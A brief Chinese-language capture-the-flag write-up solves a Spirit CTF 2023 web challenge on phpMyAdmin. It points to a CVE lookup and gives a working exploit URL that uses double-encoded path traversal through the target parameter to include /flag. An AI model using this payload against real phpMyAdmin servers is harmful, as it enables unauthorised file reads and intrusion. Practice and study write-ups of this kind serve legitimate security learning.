Spirit CTF 2023 热身赛题解 - admin

#Web #phpmyadmin #Vulnerabilities

/

题目描述

Vulnerability signin~

hint

不是sql哦~

---

是的这题不需要考虑phpMyAdmin是什么奇怪的玩意，也不需要考虑SQL注入之类的东西（test用户啥权限也没）

首先我们看一眼版本

然后让我们去CVE上搜一搜

/index.php?a=phpinfo();&target=db_sql.php%253f/../../../../../../flag